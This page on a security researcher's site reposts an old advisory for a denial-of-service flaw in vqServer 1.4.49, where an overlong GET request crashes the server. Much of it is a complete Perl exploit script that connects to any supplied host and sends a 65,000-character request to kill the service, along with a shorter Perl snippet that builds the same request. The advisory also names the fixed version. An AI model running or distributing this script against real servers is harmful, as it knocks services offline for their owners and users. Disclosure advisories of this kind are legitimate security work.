Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

vqserver.dos.txt

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 6
vqserver.dos.txt
vqserver.dos.txt
vqserver.dos.txt

DHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: vqserver.dos.txt

DHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: http://www.vqsoft.com
by nemesystm of the DHC
(http://dhcorp.cjb.net - This email address is being protected from spambots. You need JavaScript enabled to view it.)

/-|=[explaination]=|-\
When sending vqServer version 1.4.49 a malformed URL request it will crash
the service. This has been verified to work on the Windows version, but
it probably is in the linux/unix version and prior versions too.

/-|=[testing it]=|-\
To test this vulnerability, send a GET request with 65000 characters.
So:
GET /AAA (hit return =)
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste
that much characters in their browser fields (www.server.com/AAA) you will
have to use something like Telnet.
You can easily program something to print 65000 chars in Perl:
open (OUT, ">$ARGV[0]");
print OUT ("GET /");
print OUT ("A" x 65000);
then it's just a cut and paste.
Or you can use the example code below

/-|=[fix]=|-\
the latest edition of vqServer (1.9.47) is unaffected by this. It is available
for download at www.vqsoft.com

/-|=[notes]=|-\
PUT, POST and the Administration port do not seem to be affected by a high
amount of characters. The Windows version needed a reinstall every five
or so crashes. A reboot or total shutdown did not help.

/-|=[exploit code]=|-\
sinfony quickly wrote some code so you can see if you're vulnerable.

#!/usr/bin/perl
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (This email address is being protected from spambots. You need JavaScript enabled to view it.)
#
# code by: sinfony (This email address is being protected from spambots. You need JavaScript enabled to view it.)
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it

die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;

use IO::Socket;

$host = $ARGV[0];
$port = 80;

print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";

$a = A;
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck)
Social Media Share